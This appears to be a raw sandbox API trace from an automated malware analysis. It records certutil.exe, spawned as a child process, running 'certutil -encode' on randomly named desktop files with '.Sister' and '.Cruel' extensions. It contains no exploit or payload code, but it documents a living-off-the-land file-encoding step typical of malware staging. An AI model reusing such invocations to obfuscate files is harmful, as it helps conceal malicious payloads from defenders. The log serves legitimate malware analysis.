returned -2 [0225.575] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0225.575] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0225.575] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0225.575] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0225.575] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0225.575] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0225.575] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0225.575] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0225.575] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0225.575] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0225.576] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0225.576] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0225.576] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0225.576] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb358d6ed18 | out: phkResult=0xb358d6ed18*=0x23c) returned 0x0 [0225.576] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1f6e28bae60 [0225.576] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xb358d6f288, lpData=0xb358d6f2b8, lpcbData=0xb358d6f280*=0x4 | out: lpType=0xb358d6f288*=0x0, lpData=0xb358d6f2b8*=0x0, lpcbData=0xb358d6f280*=0x4) returned 0x2 [0225.576] LocalFree (hMem=0x1f6e28bae60) returned 0x0 [0225.576] RegCloseKey (hKey=0x23c) returned 0x0 [0225.576] LocalFree (hMem=0x0) returned 0x0 [0225.576] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1f6e28dfd10 [0225.605] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0225.606] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0225.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0225.606] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1f6e28e4ae0 [0225.606] GetComputerNameW (in: lpBuffer=0x1f6e28e4ae0, nSize=0xb358d6f280 | out: lpBuffer="NQDPDE", nSize=0xb358d6f280) returned 1 [0225.607] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xb358d6f250 | out: lpBuffer=0x0, nSize=0xb358d6f250) returned 0 [0225.607] GetLastError () returned 0xea [0225.607] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f6e28cc8a0 [0225.608] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1f6e28cc8a0, nSize=0xb358d6f250 | out: lpBuffer="NQdPdE", nSize=0xb358d6f250) returned 1 [0225.608] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0225.616] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1f6e28e4e50, cbCertEncoded=0x18833) returned 0x0 [0225.624] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1f6e28e4e50, cbCrlEncoded=0x18833) returned 0x0 [0225.626] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1f6e28e4e50, cbEncoded=0x18833, dwFlags=0x8000, pDecodePara=0xb358d6f130, pvStructInfo=0xb358d6f1c0, pcbStructInfo=0xb358d6f1b4 | out: pvStructInfo=0xb358d6f1c0, pcbStructInfo=0xb358d6f1b4) returned 0 [0225.627] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1f6e28e4e50, cbEncoded=0x18833, dwFlags=0x8000, pDecodePara=0xb358d6f130, pvStructInfo=0xb358d6f1c0, pcbStructInfo=0xb358d6f1b4 | out: pvStructInfo=0xb358d6f1c0, pcbStructInfo=0xb358d6f1b4) returned 0 [0225.627] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1f6e28e4e50, cbEncoded=0x18833, dwFlags=0x8000, pDecodePara=0xb358d6f130, pvStructInfo=0xb358d6f1c0, pcbStructInfo=0xb358d6f1b4 | out: pvStructInfo=0xb358d6f1c0, pcbStructInfo=0xb358d6f1b4) returned 0 [0225.627] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1f6e28c6700 [0225.637] CryptMsgUpdate (hCryptMsg=0x1f6e28c6700, pbData=0x1f6e28e4e50, cbData=0x18833, fFinal=1) returned 0 [0225.637] GetLastError () returned 0x8009310b [0225.637] CryptMsgClose (hCryptMsg=0x1f6e28c6700) returned 1 [0225.637] GetFileAttributesExW (in: lpFileName="gwc793WO9abijU0o.flv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\gwc793wo9abiju0o.flv.sister"), fInfoLevelId=0x0, lpFileInformation=0xb358d6f1e0 | out: lpFileInformation=0xb358d6f1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4497c0, ftCreationTime.dwHighDateTime=0x1d5ed5b, ftLastAccessTime.dwLowDateTime=0x7a16bb0, ftLastAccessTime.dwHighDateTime=0x1d5ecdb, ftLastWriteTime.dwLowDateTime=0x7a16bb0, ftLastWriteTime.dwHighDateTime=0x1d5ecdb, nFileSizeHigh=0x0, nFileSizeLow=0x18833)) returned 1 [0225.637] _vsnwprintf (in: _Buffer=0xb358d6f1e8, _BufferCount=0xb, _Format="%d", _ArgList=0xb358d6f1d8 | out: _Buffer="359") returned 3 [0225.638] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xb358d6efa0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0225.638] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1f6e28e47e0 [0225.638] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0225.638] _vsnwprintf (in: _Buffer=0xb358d6e1d0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xb358d6f228 | out: _Buffer="Input Length = 100403") returned 21 [0225.638] GetFileType (hFile=0x50) returned 0x2 [0225.638] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb358d6e1d0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xb358d6e184, lpReserved=0x0 | out: lpBuffer=0xb358d6e1d0*, lpNumberOfCharsWritten=0xb358d6e184*=0x15) returned 1 [0225.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0225.692] _vsnwprintf (in: _Buffer=0xb358d6e1d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xb358d6f228 | out: _Buffer="\n") returned 1 [0225.692] GetFileType (hFile=0x50) returned 0x2 [0225.692] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb358d6e1d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xb358d6e184, lpReserved=0x0 | out: lpBuffer=0xb358d6e1d0*, lpNumberOfCharsWritten=0xb358d6e184*=0x1) returned 1 [0225.771] GetFileAttributesExW (in: lpFileName="gwc793WO9abijU0o.flv.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\gwc793wo9abiju0o.flv.cruel"), fInfoLevelId=0x0, lpFileInformation=0xb358d6f1e0 | out: lpFileInformation=0xb358d6f1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb128fe8f, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xb128fe8f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb12b8068, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x21b80)) returned 1 [0225.771] _vsnwprintf (in: _Buffer=0xb358d6f1e8, _BufferCount=0xb, _Format="%d", _ArgList=0xb358d6f1d8 | out: _Buffer="361") returned 3 [0225.771] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xb358d6efa0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0225.771] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1f6e28e4c90 [0225.772] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0225.772] _vsnwprintf (in: _Buffer=0xb358d6e1d0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xb358d6f228 | out: _Buffer="Output Length = 138112") returned 22 [0225.772] GetFileType (hFile=0x50) returned 0x2 [0225.772] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb358d6e1d0*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xb358d6e184, lpReserved=0x0 | out: lpBuffer=0xb358d6e1d0*, lpNumberOfCharsWritten=0xb358d6e184*=0x16) returned 1 [0225.778] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0225.778] _vsnwprintf (in: _Buffer=0xb358d6e1d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xb358d6f228 | out: _Buffer="\n") returned 1 [0225.778] GetFileType (hFile=0x50) returned 0x2 [0225.778] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb358d6e1d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xb358d6e184, lpReserved=0x0 | out: lpBuffer=0xb358d6e1d0*, lpNumberOfCharsWritten=0xb358d6e184*=0x1) returned 1 [0225.792] LocalFree (hMem=0x1f6e28e4e50) returned 0x0 [0225.792] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0225.792] _vsnwprintf (in: _Buffer=0xb358d6f248, _BufferCount=0xb, _Format="%d", _ArgList=0xb358d6f238 | out: _Buffer="2022") returned 4 [0225.792] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xb358d6f000, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0225.792] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1f6e28b89e0 [0225.793] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0225.793] _vsnwprintf (in: _Buffer=0xb358d6e230, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xb358d6f288 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0225.793] GetFileType (hFile=0x50) returned 0x2 [0225.793] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb358d6e230*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xb358d6e1e4, lpReserved=0x0 | out: lpBuffer=0xb358d6e230*, lpNumberOfCharsWritten=0xb358d6e1e4*=0x31) returned 1 [0225.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0225.826] _vsnwprintf (in: _Buffer=0xb358d6e230, _BufferCount=0x1ff, _Format="\n", _ArgList=0xb358d6f288 | out: _Buffer="\n") returned 1 [0225.826] GetFileType (hFile=0x50) returned 0x2 [0225.826] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb358d6e230*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xb358d6e1e4, lpReserved=0x0 | out: lpBuffer=0xb358d6e230*, lpNumberOfCharsWritten=0xb358d6e1e4*=0x1) returned 1 [0225.836] LocalFree (hMem=0x0) returned 0x0 [0225.836] LocalFree (hMem=0x1f6e28b9180) returned 0x0 [0225.836] LocalFree (hMem=0x1f6e28b4430) returned 0x0 [0225.836] SetLastError (dwErrCode=0x80070716) [0225.836] _vsnwprintf (in: _Buffer=0xb358d6f2b8, _BufferCount=0xb, _Format="%d", _ArgList=0xb358d6f2a8 | out: _Buffer="511") returned 3 [0225.836] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xb358d6f070, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0225.836] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1f6e28e4cf0 [0225.837] PostQuitMessage (nExitCode=0) [0225.837] GetMessageW (in: lpMsg=0xb358d6f8b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb358d6f8b0) returned 0 [0225.837] LocalFree (hMem=0x1f6e28cc8a0) returned 0x0 [0225.837] LocalFree (hMem=0x1f6e28e4ae0) returned 0x0 [0225.837] LocalFree (hMem=0x0) returned 0x0 [0225.837] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0225.860] GetLastError () returned 0x7e [0225.860] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0225.860] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0225.860] DllMain () returned 0x1 [0225.860] LocalFree (hMem=0x1f6e28ccb60) returned 0x0 [0225.860] LocalFree (hMem=0x1f6e28c2200) returned 0x0 [0225.860] LocalFree (hMem=0x1f6e28e47e0) returned 0x0 [0225.860] LocalFree (hMem=0x1f6e28e4c90) returned 0x0 [0225.860] LocalFree (hMem=0x1f6e28b89e0) returned 0x0 [0225.861] LocalFree (hMem=0x1f6e28e4cf0) returned 0x0 [0225.861] LocalFree (hMem=0x1f6e28c5290) returned 0x0 [0225.861] LocalFree (hMem=0x1f6e28c1ed0) returned 0x0 [0225.861] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0225.861] GetLastError () returned 0x7e [0225.861] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0225.861] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0225.861] DllMain () returned 0x1 [0225.861] exit (_Code=0) Thread: id = 51 os_tid = 0xa88 Process: id = "17" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x2241e000" os_pid = "0x5b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" \"hvO9HhgzXnxX2Pa-RAL.mp4.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 52 os_tid = 0xa80 [0226.439] GetStartupInfoW (in: lpStartupInfo=0xa97f74f980 | out: lpStartupInfo=0xa97f74f980*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" \"hvO9HhgzXnxX2Pa-RAL.mp4.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0226.445] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0226.445] __set_app_type (_Type=0x1) [0226.445] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0226.446] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0226.448] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0226.449] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0226.449] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0226.449] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0226.449] WerSetFlags () returned 0x0 [0226.450] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0226.450] __iob_func () returned 0x7ffcea2dea00 [0226.450] _fileno (_File=0x7ffcea2dea30) returned 1 [0226.450] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0226.450] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0226.451] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0226.451] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0226.451] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0226.452] GetConsoleOutputCP () returned 0x1b5 [0226.452] _vsnwprintf (in: _Buffer=0xa97f74f8f0, _BufferCount=0xb, _Format=".%d", _ArgList=0xa97f74f818 | out: _Buffer=".437") returned 4 [0226.453] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0226.453] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.453] GetFileType (hFile=0x50) returned 0x2 [0226.453] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0226.453] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0226.453] SetThreadUILanguage (LangId=0x0) returned 0x409 [0226.454] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0226.454] GetCommandLineW () returned="certutil -encode \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" \"hvO9HhgzXnxX2Pa-RAL.mp4.Cruel\"" [0226.454] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2655282b690 [0226.454] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2655281cc30 [0226.454] LocalFree (hMem=0x2655282b690) returned 0x0 [0226.454] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2655281bf20 [0226.454] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2655281bec0 [0226.454] LocalFree (hMem=0x2655281bf20) returned 0x0 [0226.454] LocalFree (hMem=0x2655281cc30) returned 0x0 [0226.454] LocalFree (hMem=0x0) returned 0x0 [0226.454] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0226.455] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0226.455] GetCommandLineW () returned="certutil -encode \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" \"hvO9HhgzXnxX2Pa-RAL.mp4.Cruel\"" [0226.455] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2655282b4b0 [0226.455] GetSystemTime (in: lpSystemTime=0xa97f74f5e0 | out: lpSystemTime=0xa97f74f5e0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x0, wMilliseconds=0x3e4)) [0226.456] SystemTimeToFileTime (in: lpSystemTime=0xa97f74f5e0, lpFileTime=0xa97f74f5d8 | out: lpFileTime=0xa97f74f5d8) returned 1 [0226.456] FileTimeToLocalFileTime (in: lpFileTime=0xa97f74f5d8, lpLocalFileTime=0xa97f74f5a0 | out: lpLocalFileTime=0xa97f74f5a0) returned 1 [0226.456] FileTimeToSystemTime (in: lpFileTime=0xa97f74f5a0, lpSystemTime=0xa97f74f310 | out: lpSystemTime=0xa97f74f310) returned 1 [0226.456] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xa97f74f310, lpFormat=0x0, lpDateStr=0xa97f74f420, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0226.456] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xa97f74f310, lpFormat=0x0, lpTimeStr=0xa97f74f320, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0226.456] _vsnwprintf (in: _Buffer=0xa97f74f32e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xa97f74f2f8 | out: _Buffer=" 00.996s") returned 8 [0226.456] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2655282e170 [0226.456] SetLastError (dwErrCode=0x80070716) [0226.456] _vsnwprintf (in: _Buffer=0xa97f74f3a8, _BufferCount=0xb, _Format="%d", _ArgList=0xa97f74f398 | out: _Buffer="948") returned 3 [0226.456] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xa97f74f160, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0226.456] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2655282b990 [0226.457] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x26552834c70 [0226.457] LocalFree (hMem=0x2655282e170) returned 0x0 [0226.457] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa97f74f650 | out: lpSystemTimeAsFileTime=0xa97f74f650*(dwLowDateTime=0xb1966622, dwHighDateTime=0x1d6141f)) [0226.457] GetLocalTime (in: lpSystemTime=0xa97f74f688 | out: lpSystemTime=0xa97f74f688*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x0, wMilliseconds=0x3e5)) [0226.457] SystemTimeToFileTime (in: lpSystemTime=0xa97f74f688, lpFileTime=0xa97f74f660 | out: lpFileTime=0xa97f74f660) returned 1 [0226.457] CompareFileTime (lpFileTime1=0xa97f74f660, lpFileTime2=0xa97f74f650) returned 1 [0226.457] _vsnwprintf (in: _Buffer=0xa97f74f698, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xa97f74f628 | out: _Buffer="GMT + 2.00") returned 10 [0226.457] LocalFree (hMem=0x2655282b4b0) returned 0x0 [0226.458] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc9760000 [0226.458] FindResourceW (hModule=0x7ffcc9760000, lpName=0x1, lpType=0x10) returned 0x7ffcc9820090 [0226.458] LoadResource (hModule=0x7ffcc9760000, hResInfo=0x7ffcc9820090) returned 0x7ffcc98200b0 [0226.458] LockResource (hResData=0x7ffcc98200b0) returned 0x7ffcc98200b0 [0226.458] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0226.458] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xa97f74f6c8 | out: _Buffer="10.0.15063.447") returned 14 [0226.458] GetACP () returned 0x4e4 [0226.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0226.458] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2655282b350 [0226.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2655282b350, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0226.458] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2655282e0f0 [0226.458] _vsnwprintf (in: _Buffer=0x2655282e0f0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa97f74f718 | out: _Buffer="10.0.15063.447 retail") returned 21 [0226.458] LocalFree (hMem=0x2655282b350) returned 0x0 [0226.458] LocalFree (hMem=0x0) returned 0x0 [0226.459] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0226.459] GetACP () returned 0x4e4 [0226.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0226.459] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2655282ba90 [0226.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2655282ba90, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0226.459] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2655282df70 [0226.459] _vsnwprintf (in: _Buffer=0x2655282df70, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa97f74f718 | out: _Buffer="10.0.15063.447 retail") returned 21 [0226.459] LocalFree (hMem=0x2655282ba90) returned 0x0 [0226.459] LocalFree (hMem=0x0) returned 0x0 [0226.459] GetACP () returned 0x4e4 [0226.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0226.459] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2655282b430 [0226.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2655282b430, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0226.459] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2655282ddf0 [0226.459] _vsnwprintf (in: _Buffer=0x2655282ddf0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa97f74f748 | out: _Buffer="10.0.15063.447 retail") returned 21 [0226.459] LocalFree (hMem=0x2655282b430) returned 0x0 [0226.459] LocalFree (hMem=0x2655282e0f0) returned 0x0 [0226.459] LocalFree (hMem=0x2655282df70) returned 0x0 [0226.459] LocalFree (hMem=0x2655282ddf0) returned 0x0 [0226.459] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0226.460] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0226.460] GetStockObject (i=0) returned 0x900010 [0226.460] RegisterClassW (lpWndClass=0xa97f74f870) returned 0xc1a2 [0226.460] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x502c6 [0226.477] NtdllDefWindowProc_W () returned 0x0 [0226.477] 